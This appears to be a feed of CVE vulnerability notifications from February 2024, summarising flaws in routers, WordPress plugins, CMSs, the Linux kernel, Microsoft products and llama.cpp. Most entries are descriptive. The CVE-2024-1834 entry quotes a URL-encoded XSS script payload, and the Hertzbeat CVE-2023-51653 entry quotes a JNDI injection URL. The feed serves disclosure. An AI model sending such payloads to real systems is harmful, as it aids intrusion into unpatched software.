🚨 CVE-2023-38852Buffer Overflow vulnerability in libxlsv.1.6.2 allows a remote attacker to execute arbitrary code and cause a denial of service via a crafted XLS file to the unicode_decode_wcstombs function in xlstool.c:266.🎖@cveNotify |
|
| 2024-02-27 02:07:25 |
🚨 CVE-2022-48618The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.1, watchOS 9.2, iOS 16.2 and iPadOS 16.2, tvOS 16.2. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. Apple is aware of a report that this issue may have been exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2024-02-27 01:37:26 |
🚨 CVE-2024-27356An issue was discovered on certain GL-iNet devices. Attackers can download files such as logs via commands, potentially obtaining critical user information. This affects MT6000 4.5.5, XE3000 4.4.4, X3000 4.4.5, MT3000 4.5.0, MT2500 4.5.0, AXT1800 4.5.0, AX1800 4.5.0, A1300 4.5.0, S200 4.1.4-0300, X750 4.3.7, SFT1200 4.3.7, XE300 4.3.7, MT1300 4.3.10, AR750 4.3.10, AR750S 4.3.10, AR300M 4.3.10, AR300M16 4.3.10, B1300 4.3.10, MT300N-v2 4.3.10, X300B 3.217, S1300 3.216, SF1200 3.216, MV1000 3.216, N300 3.216, B2200 3.216, and X1200 3.203.🎖@cveNotify |
|
| 2024-02-27 01:37:25 |
🚨 CVE-2024-22544An issue was discovered in Linksys Router E1700 version 1.0.04 (build 3), allows authenticated attackers to execute arbitrary code via the setDateTime function.🎖@cveNotify |
|
| 2024-02-27 01:37:24 |
🚨 CVE-2024-22543An issue as discovered in Linksys Router E1700 1.0.04 (build 3), allows authenticated attackers to escalate privileges via a crafted GET request to the /goform/* URI or via the ExportSettings function.🎖@cveNotify |
|
| 2024-02-27 00:37:32 |
🚨 CVE-2024-24721An issue was discovered on Innovaphone PBX before 14r1 devices. The password form, used to authenticate, allows a Brute Force Attack through which an attacker may be able to access the administration panel🎖@cveNotify |
|
| 2024-02-26 23:37:24 |
🚨 CVE-2024-25247SQL Injection vulnerability in /app/api/controller/Store.php in Niushop B2B2C V5 allows attackers to run arbitrary SQL commands via latitude and longitude parameters.🎖@cveNotify |
|
| 2024-02-26 22:37:41 |
🚨 CVE-2024-26455fluent-bit 2.2.2 contains a Use-After-Free vulnerability in /fluent-bit/plugins/custom_calyptia/calyptia.c.🎖@cveNotify |
|
| 2024-02-26 22:37:40 |
🚨 CVE-2024-25768OpenDMARC 1.4.2 contains a null pointer dereference vulnerability in /OpenDMARC/libopendmarc/opendmarc_policy.c.🎖@cveNotify |
|
| 2024-02-26 22:37:36 |
🚨 CVE-2021-46906In the Linux kernel, the following vulnerability has been resolved:HID: usbhid: fix info leak in hid_submit_ctrlIn hid_submit_ctrl(), the way of calculating the report length doesn'ttake into account that report->size can be zero. When running thesyzkaller reproducer, a report of size 0 causes hid_submit_ctrl) tocalculate transfer_buffer_length as 16384. When this urb is passed tothe usb core layer, KMSAN reports an info leak of 16384 bytes.To fix this, first modify hid_report_len() to account for the zeroreport size case by using DIV_ROUND_UP for the division. Then, call itfrom hid_submit_ctrl().🎖@cveNotify |
|
| 2024-02-26 22:37:35 |
🚨 CVE-2019-25162In the Linux kernel, the following vulnerability has been resolved:i2c: Fix a potential use after freeFree the adap structure only after we are done using it.This patch just moves the put_device() down a bit to avoid theuse after free.[wsa: added comment to the code, added Fixes tag]🎖@cveNotify |
|
| 2024-02-26 22:37:34 |
🚨 CVE-2019-25161In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: prevent memory leakIn dcn*_create_resource_pool the allocated memory should be released ifconstruct pool fails.🎖@cveNotify |
|
| 2024-02-26 22:37:31 |
🚨 CVE-2024-27088es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63.🎖@cveNotify |
|
| 2024-02-26 22:37:30 |
🚨 CVE-2024-27081ESPHome is a system to control your ESP8266/ESP32. A security misconfiguration in the edit configuration file API in the dashboard component of ESPHome version 2023.12.9 (command line installation) allows authenticated remote attackers to read and write arbitrary files under the configuration directory rendering remote code execution possible. This vulnerability is patched in 2024.2.1.🎖@cveNotify |
|
| 2024-02-26 22:37:29 |
🚨 CVE-2024-25767nanomq 0.21.2 contains a Use-After-Free vulnerability in /nanomq/nng/src/core/socket.c.🎖@cveNotify |
|
| 2024-02-26 22:37:26 |
🚨 CVE-2024-24402An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component.🎖@cveNotify |
|
| 2024-02-26 22:37:25 |
🚨 CVE-2024-20684Windows Hyper-V Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-02-26 22:37:24 |
🚨 CVE-2024-20679Azure Stack Hub Spoofing Vulnerability🎖@cveNotify |
|
| 2024-02-26 21:37:30 |
🚨 CVE-2024-21410Microsoft Exchange Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-26 21:37:26 |
🚨 CVE-2024-25739create_empty_lvol in drivers/mtd/ubi/vtbl.c in the Linux kernel through 6.7.4 can attempt to allocate zero bytes, and crash, because of a missing check for ubi->leb_size.🎖@cveNotify |
|
| 2024-02-26 21:37:25 |
🚨 CVE-2023-45716Sametime is impacted by sensitive information passed in URL.🎖@cveNotify |
|
| 2024-02-26 21:37:24 |
🚨 CVE-2023-6736An issue has been discovered in GitLab EE affecting all versions starting from 11.3 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. It was possible for an attacker to cause a client-side denial of service using malicious crafted content in the CODEOWNERS file.🎖@cveNotify |
|
| 2024-02-26 17:37:37 |
🚨 CVE-2024-27088es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63.🎖@cveNotify |
|
| 2024-02-26 17:37:34 |
🚨 CVE-2024-27087Kirby is a content management system. The new link field introduced in Kirby 4 allows several different link types that each validate the entered link to the relevant URL format. It also includes a "Custom" link type for advanced use cases that don't fit any of the pre-defined link formats. As the "Custom" link type is meant to be flexible, it also allows the javascript: URL scheme. In some use cases this can be intended, but it can also be misused by attackers to execute arbitrary JavaScript code when a user or visitor clicks on a link that is generated from the contents of the link field. This vulnerability is patched in 4.1.1.🎖@cveNotify |
|
| 2024-02-26 17:37:33 |
🚨 CVE-2024-25767nanomq 0.21.2 contains a Use-After-Free vulnerability in /nanomq/nng/src/core/socket.c.🎖@cveNotify |
|
| 2024-02-26 17:37:32 |
🚨 CVE-2024-24401SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.🎖@cveNotify |
|
| 2024-02-26 17:37:28 |
🚨 CVE-2024-21836A heap-based buffer overflow vulnerability exists in the GGUF library header.n_tensors functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-26 17:37:27 |
🚨 CVE-2024-21802A heap-based buffer overflow vulnerability exists in the GGUF library info->ne functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-24 05:37:25 |
🚨 CVE-2024-21501Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.🎖@cveNotify |
|
| 2024-02-24 05:37:24 |
🚨 CVE-2024-1810The Archivist – Custom Archive Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘shortcode_attributes' parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-02-24 00:37:24 |
🚨 CVE-2024-22395Improper access control vulnerability has been identified in the SMA100 SSL-VPN virtual office portal, which in specific conditions could potentially enable a remote authenticated attacker to associate another user's MFA mobile application.🎖@cveNotify |
|
| 2024-02-23 23:37:25 |
🚨 CVE-2024-25469SQL Injection vulnerability in CRMEB crmeb_java v.1.3.4 and before allows a remote attacker to obtain sensitive information via the latitude and longitude parameters in the api/front/store/list component.🎖@cveNotify |
|
| 2024-02-23 23:37:24 |
🚨 CVE-2024-22988An issue in zkteco zkbio WDMS v.8.0.5 allows an attacker to execute arbitrary code via the /files/backup/ component.🎖@cveNotify |
|
| 2024-02-23 22:37:24 |
🚨 CVE-2024-21423Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-02-23 21:07:37 |
🚨 CVE-2024-21413Microsoft Outlook Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-23 21:07:36 |
🚨 CVE-2024-21401Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-23 20:37:32 |
🚨 CVE-2024-1834A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as problematic. This affects an unknown part of the file ?page=attendance&class_id=1. The manipulation of the argument class_date with the input 2024-02-23%22%3E%3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-23 20:37:26 |
🚨 CVE-2024-1833A vulnerability was found in SourceCodester Employee Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /Account/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254624.🎖@cveNotify |
|
| 2024-02-23 20:37:25 |
🚨 CVE-2023-51393Due to an allocation of resources without limits, an uncontrolled resource consumption vulnerability exists in Silicon Labs Ember ZNet SDK prior to v7.4.0.0 (delivered as part of Silicon Labs Gecko SDK v4.4.0) which may enable attackers to trigger a bus fault and crash of the device, requiring a reboot in order to rejoin the network.🎖@cveNotify |
|
| 2024-02-23 20:37:24 |
🚨 CVE-2023-4535An out-of-bounds read vulnerability was found in OpenSC packages within the MyEID driver when handling symmetric key encryption. Exploiting this flaw requires an attacker to have physical access to the computer and a specially crafted USB device or smart card. This flaw allows the attacker to manipulate APDU responses and potentially gain unauthorized access to sensitive data, compromising the system's security.🎖@cveNotify |
|
| 2024-02-23 20:07:30 |
🚨 CVE-2023-44330Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-23 12:37:38 |
🚨 CVE-2023-24416Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Arne Franken All In One Favicon.This issue affects All In One Favicon: from n/a through 4.7.🎖@cveNotify |
|
| 2024-02-23 11:37:37 |
🚨 CVE-2024-1362The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the cp_shortcode_refresh() function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-02-23 11:37:36 |
🚨 CVE-2023-50270Session Fixation Apache DolphinScheduler before version 3.2.0, which session is still valid after the password change.Users are recommended to upgrade to version 3.2.1, which fixes this issue.🎖@cveNotify |
|
| 2024-02-23 08:37:33 |
🚨 CVE-2024-24479A Buffer Overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the wsutil/to_str.c, and format_fractional_part_nsecs components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.🎖@cveNotify |
|
| 2024-02-23 08:37:32 |
🚨 CVE-2024-24478An issue in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the packet-bgp.c, dissect_bgp_open(tvbuff_t*tvb, proto_tree*tree, packet_info*pinfo), optlen components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.🎖@cveNotify |
|
| 2024-02-23 07:37:32 |
🚨 CVE-2024-1778The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_bookmark() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter bookmark statuses.🎖@cveNotify |
|
| 2024-02-23 07:37:31 |
🚨 CVE-2024-1776The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'form-id' parameter in all versions up to, and including, 1.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-23 07:37:30 |
🚨 CVE-2023-37540Sametime Connect desktop chat client includes, but does not use or require, the use of an Eclipse feature called Secure Storage. Using this Eclipse feature to store sensitive data can lead to exposure of that data.🎖@cveNotify |
|
| 2024-02-23 05:37:24 |
🚨 CVE-2024-22243Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.🎖@cveNotify |
|
| 2024-02-23 02:37:35 |
🚨 CVE-2024-1676Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-02-23 02:37:32 |
🚨 CVE-2024-1675Insufficient policy enforcement in Download in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-02-23 02:37:31 |
🚨 CVE-2024-1673Use after free in Accessibility in Google Chrome prior to 122.0.6261.57 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via specific UI gestures. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-02-23 02:37:30 |
🚨 CVE-2024-1671Inappropriate implementation in Site Isolation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-02-23 02:37:25 |
🚨 CVE-2023-50868The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.🎖@cveNotify |
|
| 2024-02-23 02:37:24 |
🚨 CVE-2024-0232A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.🎖@cveNotify |
|
| 2024-02-23 02:07:37 |
🚨 CVE-2024-1709ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.🎖@cveNotify |
|
| 2024-02-23 01:37:38 |
🚨 CVE-2024-1786** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DIR-600M C1 3.08. Affected by this issue is some unknown functionality of the component Telnet Service. The manipulation of the argument username leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254576. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-02-23 01:37:37 |
🚨 CVE-2024-1781A vulnerability was found in Totolink X6000R AX3000 9.4.0cu.852_20230719. It has been rated as critical. This issue affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation leads to command injection. The exploit has been disclosed to the public and may be used. The identifier VDB-254573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-23 01:37:36 |
🚨 CVE-2024-1683A DLL injection vulnerability exists where an authenticated, low-privileged local attacker could modify application files on the TIE Secure Relay host, which could allow for overriding of the configuration and running of new Secure Relay services.🎖@cveNotify |
|
| 2024-02-22 23:37:26 |
🚨 CVE-2024-25756A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formWifiBasicSet function.🎖@cveNotify |
|
| 2024-02-22 23:37:25 |
🚨 CVE-2024-25748A Stack Based Buffer Overflow vulnerability in tenda AC9 AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the fromSetIpMacBind function.🎖@cveNotify |
|
| 2024-02-22 22:37:25 |
🚨 CVE-2024-25746Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the add_white_node function.🎖@cveNotify |
|
| 2024-02-22 22:37:24 |
🚨 CVE-2022-25377The ACME-challenge endpoint in Appwrite 0.5.0 through 0.12.x before 0.12.2 allows remote attackers to read arbitrary local files via ../ directory traversal. In order to be vulnerable, APP_STORAGE_CERTIFICATES/.well-known/acme-challenge must exist on disk. (This pathname is automatically created if the user chooses to install Let's Encrypt certificates via Appwrite.)🎖@cveNotify |
|
| 2024-02-22 20:37:29 |
🚨 CVE-2024-1749A vulnerability, which was classified as problematic, has been found in Bdtask Bhojon Best Restaurant Management Software 2.9. This issue affects some unknown processing of the file /dashboard/message of the component Message Page. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254531. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-22 20:37:28 |
🚨 CVE-2023-4911A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.🎖@cveNotify |
|
| 2024-02-22 19:37:41 |
🚨 CVE-2023-50923In QUIC in RFC 9000, the Latency Spin Bit specification (section 17.4) does not strictly constrain the bit value when the feature is disabled, which might allow remote attackers to construct a covert channel with data represented as changes to the bit value. NOTE: The "Sheridan, S., Keane, A. (2015). In Proceedings of the 14th European Conference on Cyber Warfare and Security (ECCWS), University of Hertfordshire, Hatfield, UK." paper says "Modern Internet communication protocols provide an almost infinite number of ways in which data can be hidden or embed whithin seemingly normal network traffic."🎖@cveNotify |
|
| 2024-02-22 19:37:34 |
🚨 CVE-2024-26136kedi ElectronCord is a bot management tool for Discord. Commit aaaeaf4e6c99893827b2eea4dd02f755e1e24041 exposes an account access token in the `config.json` file. Malicious actors could potentially exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions on behalf of the repository owner. As of time of publication, it is unknown whether the owner of the repository has rotated the token or taken other mitigation steps aside from informing users of the situation.🎖@cveNotify |
|
| 2024-02-22 19:37:33 |
🚨 CVE-2024-23830MantisBT is an open source issue tracker. Prior to version 2.26.1, an unauthenticated attacker who knows a user's email address and username can hijack the user's account by poisoning the link in the password reset notification message. A patch is available in version 2.26.1. As a workaround, define `$g_path` as appropriate in `config_inc.php`.🎖@cveNotify |
|
| 2024-02-22 19:37:29 |
🚨 CVE-2023-47422An access control issue in /usr/sbin/httpd in Tenda TX9 V1 V22.03.02.54, Tenda AX3 V3 V16.03.12.11, Tenda AX9 V1 V22.03.01.46, and Tenda AX12 V1 V22.03.01.46 allows attackers to bypass authentication on any endpoint via a crafted URL.🎖@cveNotify |
|
| 2024-02-22 19:37:28 |
🚨 CVE-2023-48715Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.2.99.103 of Tuleap Community Edition and prior to versions 15.2-4 and 15.1-8 of Tuleap Enterprise Edition, the name of the releases are not properly escaped on the edition page of a release. A malicious user with the ability to create a FRS release could force a victim having write permissions in the FRS to execute uncontrolled code. Tuleap Community Edition 15.2.99.103, Tuleap Enterprise Edition 15.2-4, and Tuleap Enterprise Edition 15.1-8 contain a fix for this issue.🎖@cveNotify |
|
| 2024-02-22 19:07:37 |
🚨 CVE-2024-21402Microsoft Outlook Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-22 19:07:30 |
🚨 CVE-2024-21371Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-22 19:07:29 |
🚨 CVE-2023-45868The Learning Module in ILIAS 7.25 (2023-09-12 release) allows an attacker (with basic user privileges) to achieve a high-impact Directory Traversal attack on confidentiality and availability. By exploiting this network-based vulnerability, the attacker can move specified directories, normally outside the documentRoot, to a publicly accessible location via the PHP function rename(). This results in a total loss of confidentiality, exposing sensitive resources, and potentially denying access to the affected component and the operating system's components. To exploit this, an attacker must manipulate a POST request during the creation of an exercise unit, by modifying the old_name and new_name parameters via directory traversal. However, it's essential to note that, when exploiting this vulnerability, the specified directory will be relocated from its original location, rendering all files obtained from there unavailable.🎖@cveNotify |
|
| 2024-02-22 18:37:43 |
🚨 CVE-2024-25802SKINsoft S-Museum 7.02.3 allows Unrestricted File Upload via the Add Media function. Unlike in CVE-2024-25801, the attack payload is the file content.🎖@cveNotify |
|
| 2024-02-22 18:37:42 |
🚨 CVE-2024-25801SKINsoft S-Museum 7.02.3 allows XSS via the filename of an uploaded file. Unlike in CVE-2024-25802, the attack payload is in the name (not the content) of a file.🎖@cveNotify |
|
| 2024-02-22 18:37:41 |
🚨 CVE-2024-21404.NET Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-02-22 18:07:33 |
🚨 CVE-2024-21405Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-22 18:07:32 |
🚨 CVE-2023-38997A directory traversal vulnerability in the Captive Portal templates of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 allows attackers to execute arbitrary system commands as root via a crafted ZIP archive.🎖@cveNotify |
|
| 2024-02-22 17:37:25 |
🚨 CVE-2023-52161The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and instead sending Msg4/4 with an all-zero key.🎖@cveNotify |
|
| 2024-02-22 17:37:24 |
🚨 CVE-2023-52160The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase-2. This allows an adversary to impersonate Enterprise Wi-Fi networks.🎖@cveNotify |
|
| 2024-02-22 16:38:19 |
🚨 CVE-2023-51653Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.🎖@cveNotify |
|
| 2024-02-22 16:38:13 |
🚨 CVE-2023-51389Hertzbeat is a real-time monitoring system. At the interface of `/define/yml`, SnakeYAML is used as a parser to parse yml content, but no security configuration is used, resulting in a YAML deserialization vulnerability. Version 1.4.1 fixes this vulnerability.🎖@cveNotify |
|
| 2024-02-22 16:38:12 |
🚨 CVE-2024-23349Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.XSS attack when user enters summary. A logged-in user, when modifying their own submitted question, can input malicious code in the summary to create such an attack.Users are recommended to upgrade to version [1.2.5], which fixes the issue.🎖@cveNotify |
|
| 2024-02-22 16:38:11 |
🚨 CVE-2024-22393Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.Pixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.Users are recommended to upgrade to version [1.2.5], which fixes the issue.🎖@cveNotify |
|
| 2024-02-22 15:37:33 |
🚨 CVE-2024-21342Windows DNS Client Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-02-22 15:37:26 |
🚨 CVE-2024-21327Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability🎖@cveNotify |
|
| 2024-02-22 15:37:25 |
🚨 CVE-2024-20667Azure DevOps Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-22 14:38:10 |
🚨 CVE-2024-26445flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_place.php🎖@cveNotify |
|
| 2024-02-22 14:38:09 |
🚨 CVE-2024-26351flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_place.php🎖@cveNotify |
|
| 2024-02-22 14:38:08 |
🚨 CVE-2024-26349flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_translation.php🎖@cveNotify |
|
| 2024-02-22 14:38:04 |
🚨 CVE-2024-25875A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Undertitle text field.🎖@cveNotify |
|
| 2024-02-22 14:38:03 |
🚨 CVE-2024-25873Enhavo v0.13.1 was discovered to contain an HTML injection vulnerability in the Author text field under the Blockquote module. This vulnerability allows attackers to execute arbitrary code via a crafted payload.🎖@cveNotify |
|
| 2024-02-22 14:38:02 |
🚨 CVE-2024-23094Flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /cover/addons/info_media_gallery/action/edit_addon_post.php🎖@cveNotify |
|
| 2024-02-22 11:37:42 |
🚨 CVE-2023-5341A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.🎖@cveNotify |
|
| 2024-02-22 11:37:41 |
🚨 CVE-2023-1289A vulnerability was discovered in ImageMagick where a specially created SVG file loads itself and causes a segmentation fault. This flaw allows a remote attacker to pass a specially crafted SVG file that leads to a segmentation fault, generating many trash files in "/tmp," resulting in a denial of service. When ImageMagick crashes, it generates a lot of trash files. These trash files can be large if the SVG file contains many render actions. In a denial of service attack, if a remote attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. If an attacker uploads a 100M SVG, the server will generate about 10G.🎖@cveNotify |
|
| 2024-02-22 10:37:54 |
🚨 CVE-2024-26578Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.Repeated submission during registration resulted in the registration of the same user. When users register, if they rapidly submit multiple registrations using scripts, it can result in the creation of multiple user accounts simultaneously with the same name.Users are recommended to upgrade to version [1.2.5], which fixes the issue.🎖@cveNotify |
|
| 2024-02-22 10:37:49 |
🚨 CVE-2024-22393Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.Pixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.Users are recommended to upgrade to version [1.2.5], which fixes the issue.🎖@cveNotify |
|
| 2024-02-22 10:37:48 |
🚨 CVE-2023-29179A null pointer dereference in Fortinet FortiOS version 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, Fortiproxy version 7.2.0 through 7.2.4, 7.0.0 through 7.0.10 allows attacker to denial of service via specially crafted HTTP requests.🎖@cveNotify |
|
| 2024-02-22 09:37:46 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-22 06:37:26 |
🚨 CVE-2024-26491A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Media Gallery with description' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Gallery name text field.🎖@cveNotify |
|
| 2024-02-22 06:37:25 |
🚨 CVE-2024-1053The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'email' action in all versions up to, and including, 5.8.1. This makes it possible for authenticated attackers, with contributor-level access and above, to email the attendees list to themselves.🎖@cveNotify |
|
| 2024-02-22 06:37:24 |
🚨 CVE-2024-0903The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in the feedback submission page that will execute when a user clicks the link, while also pressing the command key.🎖@cveNotify |
|
| 2024-02-22 05:37:32 |
🚨 CVE-2024-26481Kirby CMS v4.1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the URL parameter.🎖@cveNotify |
|
| 2024-02-22 05:37:26 |
🚨 CVE-2024-25801An arbitrary file upload vulnerability in the Add Media function of SKINsoft S-Museum v7.02.3 allows attackers to execute arbitrary code via a crafted PDF file.🎖@cveNotify |
|
| 2024-02-22 05:37:25 |
